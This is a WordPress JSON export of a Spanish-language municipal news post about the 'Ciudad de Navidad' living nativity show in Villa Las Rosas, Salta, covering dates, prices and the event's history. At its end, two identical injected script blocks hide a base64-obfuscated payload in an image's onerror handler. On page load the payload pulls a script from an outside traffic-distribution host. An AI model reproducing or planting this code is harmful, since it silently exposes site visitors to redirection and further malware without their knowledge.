{"id":1996,"date":"2022-12-26T15:16:03","date_gmt":"2022-12-26T18:16:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1996"},"modified":"2025-08-14T00:27:04","modified_gmt":"2025-08-14T03:27:04","slug":"el-municipio-invita-a-disfrutar-del-espectaculo-ciudad-de-navidad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1996","title":{"rendered":"El municipio invita a disfrutar\u00a0del espect\u00e1culo Ciudad de Navidad\u00a0"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#690e24\"><strong><em>La comuna acompa\u00f1a, un a\u00f1o m\u00e1s, a los vecinos de Villa Las Rosas en esta propuesta navide\u00f1a. M\u00e1s de 200 personas actuar\u00e1n en el escenario natural del cerro Capit\u00e1n.<\/em><\/strong><\/h4>\n\n\n\n<p>La Secretar\u00eda de Cultura y Turismo de la Municipalidad junto al Centro vecinal de Villas Las Rosas invita a disfrutar del espect\u00e1culo \u201cCiudad de Navidad 2022-2023\u201d que se llevar\u00e1 a cabo, como siempre, en el escenario natural del cerro Capit\u00e1n en Villa Las Rosas.<\/p>\n\n\n\n<p>El conocido e hist\u00f3rico Pesebre Viviente subir\u00e1 a escena a las 21.30 horas en las siguientes fechas: 30 de diciembre de 2022 y 1, 5, 6, 7 y 8 de enero de 2023.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1997\" width=\"431\" height=\"431\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-1024x1024.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-300x300.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-150x150.jpeg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-768x768.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-696x696.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-1068x1068.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer-420x420.jpeg 420w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/ciudad-de-navidad-flyer.jpeg 1280w\" sizes=\"(max-width: 431px) 100vw, 431px\" \/><\/figure><\/div>\n\n\n<p>El espect\u00e1culo navide\u00f1o estar\u00e1 dirigido por&nbsp;Jos\u00e9 \u201cTano\u201d Belbruno y un equipo de colaboradores. Reunir\u00e1 a m\u00e1s de 200 personas entre ni\u00f1os, j\u00f3venes, adultos y adultos mayores, con iluminaci\u00f3n profesional, efectos especiales, vestuario artesanal -realizados por integrantes de la comisi\u00f3n directiva y colaboradores del barrio-, musicalizaci\u00f3n y grabaci\u00f3n digital, acorde al escenario natural donde se desarrolla el espect\u00e1culo.<\/p>\n\n\n\n<p>Julio Romero, presidente del Centro vecinal Villa Las Rosas, agradeci\u00f3 al municipio por el trabajo articulado, y dijo: \u201csumamos la fecha del 30 de diciembre debido a la lluvia que complica al ser un escenario natural nuestro cerro&nbsp;Capit\u00e1n. Aprovecho esta oportunidad para invitar a todos, a nuestro querido e hist\u00f3rico pesebre de Ciudad de Navidad que en este a\u00f1o tendr\u00e1 la particularidad de contar con un vestuario hecho integralmente por los vecinos\u201d.<\/p>\n\n\n\n<p>Las entradas tienen un costo para mayores de $500 y para los menores de 10 a\u00f1os&nbsp;$400. Hay descuentos para grupos familiares de m\u00e1s de 5 integrantes.<\/p>\n\n\n\n<p>El espect\u00e1culo tiene una duraci\u00f3n de una hora aproximadamente. Las funciones se suspenden por condiciones clim\u00e1ticas y se reprograman.<\/p>\n\n\n\n<p>Adem\u00e1s, siguiendo la tradici\u00f3n,&nbsp;en el barrio se realizan los concursos a mejor ornamentaci\u00f3n del frente de casa y al mejor \u00e1rbol de navidad. Participan vecinos de la barriada de villa Las Rosas y se desarrollar\u00e1 durante diciembre y hasta el 6 de enero del 2023. Terminar\u00e1 con la publicaci\u00f3n de los ganadores el 8 de enero del 2023.<\/p>\n\n\n\n<p><strong>Un Poco de Historia<\/strong><\/p>\n\n\n\n<p>El 11 de diciembre de 1966 se anunci\u00f3 oficialmente y por primera vez que en Villa Las Rosas se levantar\u00eda la \u00abCiudad de Navidad\u00bb. La idea surgi\u00f3 del Centro vecinal de Villa Las Rosas, presidido por entonces por do\u00f1a Yone de Cattanessi e integrado por Sylvia Grondona y Domingo Ferrari, entre otros.<\/p>\n\n\n\n<p>El proyecto&nbsp;ten\u00eda por objeto escenificar el nacimiento del&nbsp;Ni\u00f1o Jes\u00fas&nbsp; y se realizar\u00eda&nbsp;en el \u00e1rea comprendida por la plazoleta de la villa, la avenida Los Lirios y la cara occidental del faldeo de la serran\u00eda.<\/p>\n\n\n\n<p>En esa superficie se erigir\u00eda el pesebre, un \u00e1rbol de Navidad gigante y un escenario donde se har\u00edan festivales y desfiles de artistas folkl\u00f3ricos.<\/p>\n\n\n\n<p>Paralelamente y dentro del proyecto, los vecinos deb\u00edan&nbsp;adornar sus casas con pesebres y dem\u00e1s motivos navide\u00f1os, y tambi\u00e9n&nbsp; sus jardines, ya que se organizaron tres concursos: uno para seleccionar el mejor frente navide\u00f1o, otro para pesebres y, el tercero, para arbolitos de Navidad.<\/p>\n\n\n\n<p>Tambi\u00e9n&nbsp;en 1966 se anunci\u00f3 que en la falda del cerro se har\u00eda la representaci\u00f3n viviente del Pesebre de Bel\u00e9n, mientras que en el escenario a levantarse en la plazoleta se presentar\u00edan espect\u00e1culos art\u00edsticos y n\u00fameros folcl\u00f3ricos.<\/p>\n\n\n\n<p>D\u00edas despu\u00e9s&nbsp;el&nbsp;gobierno provincial declaraba a Villa Las Rosas como \u00abCiudad de Navidad\u00bb. La noticia caus\u00f3 gran impacto ya que hasta ese momento se sol\u00edan hacer pesebres vivientes en distintos puntos de la ciudad, pero nunca antes utilizando el faldeo del cerro.<\/p>\n\n\n\n<p>Los vecinos de Villa Las Rosas trabajaron durante diez d\u00edas para tratar de levantar la Ciudad de Navidad con los inconvenientes clim\u00e1ticos propios de diciembre. Las lluvias muy intensas de ese 1966 provocaron que las aguas se llevaran el puente de Yrigoyen y Acevedo.<\/p>\n\n\n\n<p>Esta situaci\u00f3n&nbsp;complic\u00f3 los trabajos que deb\u00edan realizarse al aire libre, raz\u00f3n por la cual el 20 de diciembre, a solo cuatro d\u00edas de Navidad, el Centro Vecinal de Villa Las Rosas debi\u00f3 anunciar la postergaci\u00f3n de la inauguraci\u00f3n de Ciudad de Navidad, hasta el d\u00eda de los Reyes Magos, es decir hasta el 6 de enero de 1967.<\/p>\n\n\n\n<p>Fue esta postergaci\u00f3n la que caus\u00f3, a\u00f1os despu\u00e9s, confusi\u00f3n con respecto a los a\u00f1os que tiene Ciudad de Navidad.<\/p>\n\n\n\n<p>Los a\u00f1os no coinciden con las ediciones presentadas, pues hay que recordar que en 1974 Ciudad de Navidad tuvo dos ediciones: la de octubre por el Congreso Eucar\u00edstico Nacional, y la segunda, para la Navidad de ese a\u00f1o.<\/p>\n\n\n\n<p>Durante la pandemia por COVID-19 se realiz\u00f3 la edici\u00f3n cumpliendo las normativas vigentes, luego de la misma se desarroll\u00f3 la edici\u00f3n 56 entre diciembre de 2021 y enero del 2022, de la mano de una comisi\u00f3n vecinal nueva a cargo de Julio Romero.<\/p>\n\n\n\n<p>Para esta temporada 2022- 2023,\u00a0con aportes de vecinos y amigos se renov\u00f3 gran parte del vestuario, la escenograf\u00eda y el relato llev\u00e1ndolo a una forma mixta ya que habr\u00e1 actuaciones en vivo y grabadas.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"1998\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas1-1024x462.jpeg\" alt=\"\" class=\"wp-image-1998\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1999\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-1024x768.jpeg\" alt=\"\" class=\"wp-image-1999\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-1024x768.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-300x225.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-768x576.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-696x522.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-1068x801.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-560x420.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-80x60.jpeg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2-265x198.jpeg 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas2.jpeg 1156w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2000\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-1024x576.jpeg\" alt=\"\" class=\"wp-image-2000\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-1024x576.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-1536x864.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-696x391.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-1068x600.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4-747x420.jpeg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/villa-las-rosas4.jpeg 1599w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La comuna acompa\u00f1a, un a\u00f1o m\u00e1s, a los vecinos de Villa Las Rosas en esta propuesta navide\u00f1a. M\u00e1s de 200 personas actuar\u00e1n en el escenario natural del cerro Capit\u00e1n. La Secretar\u00eda de Cultura y Turismo de la Municipalidad junto al Centro vecinal de Villas Las Rosas invita a disfrutar del espect\u00e1culo \u201cCiudad de Navidad 2022-2023\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1999,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,2],"tags":[],"class_list":{"0":"post-1996","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-religiosos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1996"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1996"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1996\/revisions"}],"predecessor-version":[{"id":7230,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1996\/revisions\/7230"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1999"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1996"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1996"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1996"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}